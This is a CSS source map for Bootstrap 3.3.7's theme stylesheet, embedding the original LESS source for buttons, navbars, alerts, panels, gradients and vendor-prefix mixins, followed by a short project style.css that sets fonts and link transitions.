1 | {"version":3,"sources":["less/theme.less","less/mixins/vendor-prefixes.less","less/mixins/gradients.less","less/mixins/reset-filter.less"],"names":[],"mappings":"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","sourcesContent":["/*!\n * Bootstrap v3.3.7 (http://getbootstrap.com)\n * Copyright 2011-2016 Twitter, Inc.\n * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)\n */\n\n//\n// Load core variables and mixins\n// --------------------------------------------------\n\n@import \"variables.less\";\n@import \"mixins.less\";\n\n\n//\n// Buttons\n// --------------------------------------------------\n\n// Common styles\n.btn-default,\n.btn-primary,\n.btn-success,\n.btn-info,\n.btn-warning,\n.btn-danger {\n  text-shadow: 0 -1px 0 rgba(0,0,0,.2);\n  @shadow: inset 0 1px 0 rgba(255,255,255,.15), 0 1px 1px rgba(0,0,0,.075);\n  .box-shadow(@shadow);\n\n  // Reset the shadow\n  &:active,\n  &.active {\n    .box-shadow(inset 0 3px 5px rgba(0,0,0,.125));\n  }\n\n  &.disabled,\n  &[disabled],\n  fieldset[disabled] & {\n    .box-shadow(none);\n  }\n\n  .badge {\n    text-shadow: none;\n  }\n}\n\n// Mixin for generating new styles\n.btn-styles(@btn-color: #555) {\n  #gradient > .vertical(@start-color: @btn-color; @end-color: darken(@btn-color, 12%));\n  .reset-filter(); // Disable gradients for IE9 because filter bleeds through rounded corners; see https://github.com/twbs/bootstrap/issues/10620\n  background-repeat: repeat-x;\n  border-color: darken(@btn-color, 14%);\n\n  &:hover,\n  &:focus  {\n    background-color: darken(@btn-color, 12%);\n    background-position: 0 -15px;\n  }\n\n  &:active,\n  &.active {\n    background-color: darken(@btn-color, 12%);\n    border-color: darken(@btn-color, 14%);\n  }\n\n  &.disabled,\n  &[disabled],\n  fieldset[disabled] & {\n    &,\n    &:hover,\n    &:focus,\n    &.focus,\n    &:active,\n    &.active {\n      background-color: darken(@btn-color, 12%);\n      background-image: none;\n    }\n  }\n}\n\n// Common styles\n.btn {\n  // Remove the gradient for the pressed/active state\n  &:active,\n  &.active {\n    background-image: none;\n  }\n}\n\n// Apply the mixin to the buttons\n.btn-default { .btn-styles(@btn-default-bg); text-shadow: 0 1px 0 #fff; border-color: #ccc; }\n.btn-primary { .btn-styles(@btn-primary-bg); }\n.btn-success { .btn-styles(@btn-success-bg); }\n.btn-info    { .btn-styles(@btn-info-bg); }\n.btn-warning { .btn-styles(@btn-warning-bg); }\n.btn-danger  { .btn-styles(@btn-danger-bg); }\n\n\n//\n// Images\n// --------------------------------------------------\n\n.thumbnail,\n.img-thumbnail {\n  .box-shadow(0 1px 2px rgba(0,0,0,.075));\n}\n\n\n//\n// Dropdowns\n// --------------------------------------------------\n\n.dropdown-menu > li > a:hover,\n.dropdown-menu > li > a:focus {\n  #gradient > .vertical(@start-color: @dropdown-link-hover-bg; @end-color: darken(@dropdown-link-hover-bg, 5%));\n  background-color: darken(@dropdown-link-hover-bg, 5%);\n}\n.dropdown-menu > .active > a,\n.dropdown-menu > .active > a:hover,\n.dropdown-menu > .active > a:focus {\n  #gradient > .vertical(@start-color: @dropdown-link-active-bg; @end-color: darken(@dropdown-link-active-bg, 5%));\n  background-color: darken(@dropdown-link-active-bg, 5%);\n}\n\n\n//\n// Navbar\n// --------------------------------------------------\n\n// Default navbar\n.navbar-default {\n  #gradient > .vertical(@start-color: lighten(@navbar-default-bg, 10%); @end-color: @navbar-default-bg);\n  .reset-filter(); // Remove gradient in IE<10 to fix bug where dropdowns don't get triggered\n  border-radius: @navbar-border-radius;\n  @shadow: inset 0 1px 0 rgba(255,255,255,.15), 0 1px 5px rgba(0,0,0,.075);\n  .box-shadow(@shadow);\n\n  .navbar-nav > .open > a,\n  .navbar-nav > .active > a {\n    #gradient > .vertical(@start-color: darken(@navbar-default-link-active-bg, 5%); @end-color: darken(@navbar-default-link-active-bg, 2%));\n    .box-shadow(inset 0 3px 9px rgba(0,0,0,.075));\n  }\n}\n.navbar-brand,\n.navbar-nav > li > a {\n  text-shadow: 0 1px 0 rgba(255,255,255,.25);\n}\n\n// Inverted navbar\n.navbar-inverse {\n  #gradient > .vertical(@start-color: lighten(@navbar-inverse-bg, 10%); @end-color: @navbar-inverse-bg);\n  .reset-filter(); // Remove gradient in IE<10 to fix bug where dropdowns don't get triggered; see https://github.com/twbs/bootstrap/issues/10257\n  border-radius: @navbar-border-radius;\n  .navbar-nav > .open > a,\n  .navbar-nav > .active > a {\n    #gradient > .vertical(@start-color: @navbar-inverse-link-active-bg; @end-color: lighten(@navbar-inverse-link-active-bg, 2.5%));\n    .box-shadow(inset 0 3px 9px rgba(0,0,0,.25));\n  }\n\n  .navbar-brand,\n  .navbar-nav > li > a {\n    text-shadow: 0 -1px 0 rgba(0,0,0,.25);\n  }\n}\n\n// Undo rounded corners in static and fixed navbars\n.navbar-static-top,\n.navbar-fixed-top,\n.navbar-fixed-bottom {\n  border-radius: 0;\n}\n\n// Fix active state of dropdown items in collapsed mode\n@media (max-width: @grid-float-breakpoint-max) {\n  .navbar .navbar-nav .open .dropdown-menu > .active > a {\n    &,\n    &:hover,\n    &:focus {\n      color: #fff;\n      #gradient > .vertical(@start-color: @dropdown-link-active-bg; @end-color: darken(@dropdown-link-active-bg, 5%));\n    }\n  }\n}\n\n\n//\n// Alerts\n// --------------------------------------------------\n\n// Common styles\n.alert {\n  text-shadow: 0 1px 0 rgba(255,255,255,.2);\n  @shadow: inset 0 1px 0 rgba(255,255,255,.25), 0 1px 2px rgba(0,0,0,.05);\n  .box-shadow(@shadow);\n}\n\n// Mixin for generating new styles\n.alert-styles(@color) {\n  #gradient > .vertical(@start-color: @color; @end-color: darken(@color, 7.5%));\n  border-color: darken(@color, 15%);\n}\n\n// Apply the mixin to the alerts\n.alert-success    { .alert-styles(@alert-success-bg); }\n.alert-info       { .alert-styles(@alert-info-bg); }\n.alert-warning    { .alert-styles(@alert-warning-bg); }\n.alert-danger     { .alert-styles(@alert-danger-bg); }\n\n\n//\n// Progress bars\n// --------------------------------------------------\n\n// Give the progress background some depth\n.progress {\n  #gradient > .vertical(@start-color: darken(@progress-bg, 4%); @end-color: @progress-bg)\n}\n\n// Mixin for generating new styles\n.progress-bar-styles(@color) {\n  #gradient > .vertical(@start-color: @color; @end-color: darken(@color, 10%));\n}\n\n// Apply the mixin to the progress bars\n.progress-bar            { .progress-bar-styles(@progress-bar-bg); }\n.progress-bar-success    { .progress-bar-styles(@progress-bar-success-bg); }\n.progress-bar-info       { .progress-bar-styles(@progress-bar-info-bg); }\n.progress-bar-warning    { .progress-bar-styles(@progress-bar-warning-bg); }\n.progress-bar-danger     { .progress-bar-styles(@progress-bar-danger-bg); }\n\n// Reset the striped class because our mixins don't do multiple gradients and\n// the above custom styles override the new `.progress-bar-striped` in v3.2.0.\n.progress-bar-striped {\n  #gradient > .striped();\n}\n\n\n//\n// List groups\n// --------------------------------------------------\n\n.list-group {\n  border-radius: @border-radius-base;\n  .box-shadow(0 1px 2px rgba(0,0,0,.075));\n}\n.list-group-item.active,\n.list-group-item.active:hover,\n.list-group-item.active:focus {\n  text-shadow: 0 -1px 0 darken(@list-group-active-bg, 10%);\n  #gradient > .vertical(@start-color: @list-group-active-bg; @end-color: darken(@list-group-active-bg, 7.5%));\n  border-color: darken(@list-group-active-border, 7.5%);\n\n  .badge {\n    text-shadow: none;\n  }\n}\n\n\n//\n// Panels\n// --------------------------------------------------\n\n// Common styles\n.panel {\n  .box-shadow(0 1px 2px rgba(0,0,0,.05));\n}\n\n// Mixin for generating new styles\n.panel-heading-styles(@color) {\n  #gradient > .vertical(@start-color: @color; @end-color: darken(@color, 5%));\n}\n\n// Apply the mixin to the panel headings only\n.panel-default > .panel-heading   { .panel-heading-styles(@panel-default-heading-bg); }\n.panel-primary > .panel-heading   { .panel-heading-styles(@panel-primary-heading-bg); }\n.panel-success > .panel-heading   { .panel-heading-styles(@panel-success-heading-bg); }\n.panel-info > .panel-heading      { .panel-heading-styles(@panel-info-heading-bg); }\n.panel-warning > .panel-heading   { .panel-heading-styles(@panel-warning-heading-bg); }\n.panel-danger > .panel-heading    { .panel-heading-styles(@panel-danger-heading-bg); }\n\n\n//\n// Wells\n// --------------------------------------------------\n\n.well {\n  #gradient > .vertical(@start-color: darken(@well-bg, 5%); @end-color: @well-bg);\n  border-color: darken(@well-bg, 10%);\n  @shadow: inset 0 1px 3px rgba(0,0,0,.05), 0 1px 0 rgba(255,255,255,.1);\n  .box-shadow(@shadow);\n}\n","// Vendor Prefixes\n//\n// All vendor mixins are deprecated as of v3.2.0 due to the introduction of\n// Autoprefixer in our Gruntfile. They have been removed in v4.\n\n// - Animations\n// - Backface visibility\n// - Box shadow\n// - Box sizing\n// - Content columns\n// - Hyphens\n// - Placeholder text\n// - Transformations\n// - Transitions\n// - User Select\n\n\n// Animations\n.animation(@animation) {\n  -webkit-animation: @animation;\n       -o-animation: @animation;\n          animation: @animation;\n}\n.animation-name(@name) {\n  -webkit-animation-name: @name;\n          animation-name: @name;\n}\n.animation-duration(@duration) {\n  -webkit-animation-duration: @duration;\n          animation-duration: @duration;\n}\n.animation-timing-function(@timing-function) {\n  -webkit-animation-timing-function: @timing-function;\n          animation-timing-function: @timing-function;\n}\n.animation-delay(@delay) {\n  -webkit-animation-delay: @delay;\n          animation-delay: @delay;\n}\n.animation-iteration-count(@iteration-count) {\n  -webkit-animation-iteration-count: @iteration-count;\n          animation-iteration-count: @iteration-count;\n}\n.animation-direction(@direction) {\n  -webkit-animation-direction: @direction;\n          animation-direction: @direction;\n}\n.animation-fill-mode(@fill-mode) {\n  -webkit-animation-fill-mode: @fill-mode;\n          animation-fill-mode: @fill-mode;\n}\n\n// Backface visibility\n// Prevent browsers from flickering when using CSS 3D transforms.\n// Default value is `visible`, but can be changed to `hidden`\n\n.backface-visibility(@visibility) {\n  -webkit-backface-visibility: @visibility;\n     -moz-backface-visibility: @visibility;\n          backface-visibility: @visibility;\n}\n\n// Drop shadows\n//\n// Note: Deprecated `.box-shadow()` as of v3.1.0 since all of Bootstrap's\n// supported browsers that have box shadow capabilities now support it.\n\n.box-shadow(@shadow) {\n  -webkit-box-shadow: @shadow; // iOS <4.3 & Android <4.1\n          box-shadow: @shadow;\n}\n\n// Box sizing\n.box-sizing(@boxmodel) {\n  -webkit-box-sizing: @boxmodel;\n     -moz-box-sizing: @boxmodel;\n          box-sizing: @boxmodel;\n}\n\n// CSS3 Content Columns\n.content-columns(@column-count; @column-gap: @grid-gutter-width) {\n  -webkit-column-count: @column-count;\n     -moz-column-count: @column-count;\n          column-count: @column-count;\n  -webkit-column-gap: @column-gap;\n     -moz-column-gap: @column-gap;\n          column-gap: @column-gap;\n}\n\n// Optional hyphenation\n.hyphens(@mode: auto) {\n  word-wrap: break-word;\n  -webkit-hyphens: @mode;\n     -moz-hyphens: @mode;\n      -ms-hyphens: @mode; // IE10+\n       -o-hyphens: @mode;\n          hyphens: @mode;\n}\n\n// Placeholder text\n.placeholder(@color: @input-color-placeholder) {\n  // Firefox\n  &::-moz-placeholder {\n    color: @color;\n    opacity: 1; // Override Firefox's unusual default opacity; see https://github.com/twbs/bootstrap/pull/11526\n  }\n  &:-ms-input-placeholder { color: @color; } // Internet Explorer 10+\n  &::-webkit-input-placeholder  { color: @color; } // Safari and Chrome\n}\n\n// Transformations\n.scale(@ratio) {\n  -webkit-transform: scale(@ratio);\n      -ms-transform: scale(@ratio); // IE9 only\n       -o-transform: scale(@ratio);\n          transform: scale(@ratio);\n}\n.scale(@ratioX; @ratioY) {\n  -webkit-transform: scale(@ratioX, @ratioY);\n      -ms-transform: scale(@ratioX, @ratioY); // IE9 only\n       -o-transform: scale(@ratioX, @ratioY);\n          transform: scale(@ratioX, @ratioY);\n}\n.scaleX(@ratio) {\n  -webkit-transform: scaleX(@ratio);\n      -ms-transform: scaleX(@ratio); // IE9 only\n       -o-transform: scaleX(@ratio);\n          transform: scaleX(@ratio);\n}\n.scaleY(@ratio) {\n  -webkit-transform: scaleY(@ratio);\n      -ms-transform: scaleY(@ratio); // IE9 only\n       -o-transform: scaleY(@ratio);\n          transform: scaleY(@ratio);\n}\n.skew(@x; @y) {\n  -webkit-transform: skewX(@x) skewY(@y);\n      -ms-transform: skewX(@x) skewY(@y); // See https://github.com/twbs/bootstrap/issues/4885; IE9+\n       -o-transform: skewX(@x) skewY(@y);\n          transform: skewX(@x) skewY(@y);\n}\n.translate(@x; @y) {\n  -webkit-transform: translate(@x, @y);\n      -ms-transform: translate(@x, @y); // IE9 only\n       -o-transform: translate(@x, @y);\n          transform: translate(@x, @y);\n}\n.translate3d(@x; @y; @z) {\n  -webkit-transform: translate3d(@x, @y, @z);\n          transform: translate3d(@x, @y, @z);\n}\n.rotate(@degrees) {\n  -webkit-transform: rotate(@degrees);\n      -ms-transform: rotate(@degrees); // IE9 only\n       -o-transform: rotate(@degrees);\n          transform: rotate(@degrees);\n}\n.rotateX(@degrees) {\n  -webkit-transform: rotateX(@degrees);\n      -ms-transform: rotateX(@degrees); // IE9 only\n       -o-transform: rotateX(@degrees);\n          transform: rotateX(@degrees);\n}\n.rotateY(@degrees) {\n  -webkit-transform: rotateY(@degrees);\n      -ms-transform: rotateY(@degrees); // IE9 only\n       -o-transform: rotateY(@degrees);\n          transform: rotateY(@degrees);\n}\n.perspective(@perspective) {\n  -webkit-perspective: @perspective;\n     -moz-perspective: @perspective;\n          perspective: @perspective;\n}\n.perspective-origin(@perspective) {\n  -webkit-perspective-origin: @perspective;\n     -moz-perspective-origin: @perspective;\n          perspective-origin: @perspective;\n}\n.transform-origin(@origin) {\n  -webkit-transform-origin: @origin;\n     -moz-transform-origin: @origin;\n      -ms-transform-origin: @origin; // IE9 only\n          transform-origin: @origin;\n}\n\n\n// Transitions\n\n.transition(@transition) {\n  -webkit-transition: @transition;\n       -o-transition: @transition;\n          transition: @transition;\n}\n.transition-property(@transition-property) {\n  -webkit-transition-property: @transition-property;\n          transition-property: @transition-property;\n}\n.transition-delay(@transition-delay) {\n  -webkit-transition-delay: @transition-delay;\n          transition-delay: @transition-delay;\n}\n.transition-duration(@transition-duration) {\n  -webkit-transition-duration: @transition-duration;\n          transition-duration: @transition-duration;\n}\n.transition-timing-function(@timing-function) {\n  -webkit-transition-timing-function: @timing-function;\n          transition-timing-function: @timing-function;\n}\n.transition-transform(@transition) {\n  -webkit-transition: -webkit-transform @transition;\n     -moz-transition: -moz-transform @transition;\n       -o-transition: -o-transform @transition;\n          transition: transform @transition;\n}\n\n\n// User select\n// For selecting text on the page\n\n.user-select(@select) {\n  -webkit-user-select: @select;\n     -moz-user-select: @select;\n      -ms-user-select: @select; // IE10+\n          user-select: @select;\n}\n","// Gradients\n\n#gradient {\n\n  // Horizontal gradient, from left to right\n  //\n  // Creates two color stops, start and end, by specifying a color and position for each color stop.\n  // Color stops are not available in IE9 and below.\n  .horizontal(@start-color: #555; @end-color: #333; @start-percent: 0%; @end-percent: 100%) {\n    background-image: -webkit-linear-gradient(left, @start-color @start-percent, @end-color @end-percent); // Safari 5.1-6, Chrome 10+\n    background-image: -o-linear-gradient(left, @start-color @start-percent, @end-color @end-percent); // Opera 12\n    background-image: linear-gradient(to right, @start-color @start-percent, @end-color @end-percent); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+\n    background-repeat: repeat-x;\n    filter: e(%(\"progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)\",argb(@start-color),argb(@end-color))); // IE9 and down\n  }\n\n  // Vertical gradient, from top to bottom\n  //\n  // Creates two color stops, start and end, by specifying a color and position for each color stop.\n  // Color stops are not available in IE9 and below.\n  .vertical(@start-color: #555; @end-color: #333; @start-percent: 0%; @end-percent: 100%) {\n    background-image: -webkit-linear-gradient(top, @start-color @start-percent, @end-color @end-percent);  // Safari 5.1-6, Chrome 10+\n    background-image: -o-linear-gradient(top, @start-color @start-percent, @end-color @end-percent);  // Opera 12\n    background-image: linear-gradient(to bottom, @start-color @start-percent, @end-color @end-percent); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+\n    background-repeat: repeat-x;\n    filter: e(%(\"progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)\",argb(@start-color),argb(@end-color))); // IE9 and down\n  }\n\n  .directional(@start-color: #555; @end-color: #333; @deg: 45deg) {\n    background-repeat: repeat-x;\n    background-image: -webkit-linear-gradient(@deg, @start-color, @end-color); // Safari 5.1-6, Chrome 10+\n    background-image: -o-linear-gradient(@deg, @start-color, @end-color); // Opera 12\n    background-image: linear-gradient(@deg, @start-color, @end-color); // Standard, IE10, Firefox 16+, Opera 12.10+, Safari 7+, Chrome 26+\n  }\n  .horizontal-three-colors(@start-color: #00b3ee; @mid-color: #7a43b6; @color-stop: 50%; @end-color: #c3325f) {\n    background-image: -webkit-linear-gradient(left, @start-color, @mid-color @color-stop, @end-color);\n    background-image: -o-linear-gradient(left, @start-color, @mid-color @color-stop, @end-color);\n    background-image: linear-gradient(to right, @start-color, @mid-color @color-stop, @end-color);\n    background-repeat: no-repeat;\n    filter: e(%(\"progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)\",argb(@start-color),argb(@end-color))); // IE9 and down, gets no color-stop at all for proper fallback\n  }\n  .vertical-three-colors(@start-color: #00b3ee; @mid-color: #7a43b6; @color-stop: 50%; @end-color: #c3325f) {\n    background-image: -webkit-linear-gradient(@start-color, @mid-color @color-stop, @end-color);\n    background-image: -o-linear-gradient(@start-color, @mid-color @color-stop, @end-color);\n    background-image: linear-gradient(@start-color, @mid-color @color-stop, @end-color);\n    background-repeat: no-repeat;\n    filter: e(%(\"progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)\",argb(@start-color),argb(@end-color))); // IE9 and down, gets no color-stop at all for proper fallback\n  }\n  .radial(@inner-color: #555; @outer-color: #333) {\n    background-image: -webkit-radial-gradient(circle, @inner-color, @outer-color);\n    background-image: radial-gradient(circle, @inner-color, @outer-color);\n    background-repeat: no-repeat;\n  }\n  .striped(@color: rgba(255,255,255,.15); @angle: 45deg) {\n    background-image: -webkit-linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);\n    background-image: -o-linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);\n    background-image: linear-gradient(@angle, @color 25%, transparent 25%, transparent 50%, @color 50%, @color 75%, transparent 75%, transparent);\n  }\n}\n","// Reset filters for IE\n//\n// When you need to remove a gradient background, do not forget to use this to reset\n// the IE filter for IE9 and below.\n\n.reset-filter() {\n  filter: e(%(\"progid:DXImageTransform.Microsoft.gradient(enabled = false)\"));\n}\n"]}


--------------------------------------------------------------------------------
/static/css/style.css:
--------------------------------------------------------------------------------
  1 | body{
  2 | 	font-family: 'Microsoft YaHei', sans-serif;
  3 | }
  4 | body a{
  5 | 	transition: 0.5s all;
  6 | 	-webkit-transition: 0.5s all;
  7 | 	-o-transition: 0.5s all;
  8 | 	-moz-transition: 0.5s all;
  9 | 	-ms-transition: 0.5s all;
 10 | }
 11 |  ul{
 12 | 	padding: 0;
 13 | 	margin: 0;
 14 | }
 15 | h1,h2,h3,h4,h5,h6{
 16 | 	margin:0;
 17 | font-family: 'Microsoft YaHei UI Light', sans-serif;
 18 | }
